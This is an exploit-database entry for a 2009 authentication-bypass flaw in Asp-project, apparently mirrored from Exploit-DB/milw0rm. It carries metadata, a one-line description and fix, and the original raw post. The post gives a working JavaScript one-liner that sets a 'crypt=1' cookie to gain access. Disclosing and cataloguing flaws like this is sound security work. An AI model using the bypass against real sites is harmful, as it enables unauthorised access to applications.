header-logo
Suggest Exploit
vendor:
Asp-project
by:
Sina Yazdanmehr (R3d.W0rm)
7.5
CVSS
HIGH
Cookie Handling Vulnerability
200
CWE
Product Name: Asp-project
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Asp-project Cookie Handling Vulnerability

A vulnerability in Asp-project allows an attacker to set a cookie with the name 'crypt' and value '1' to gain access to the application.

Mitigation:

The application should be configured to reject cookies with invalid names.
Source

Exploit-DB raw data:

#####################################################################################
####                        Asp-project Cookie Handling                          ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://www.sourceforge.net/projects/asp-project                         #
#                                                                                   #
#Dork : :(                                                                          #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#javascript:document.cookie = "crypt=1; path=/";                                    #
#                                                                                   #
###################################### TNX GOD ######################################

# milw0rm.com [2009-01-22]

Navigation

Suggest Exploit

Services By CQR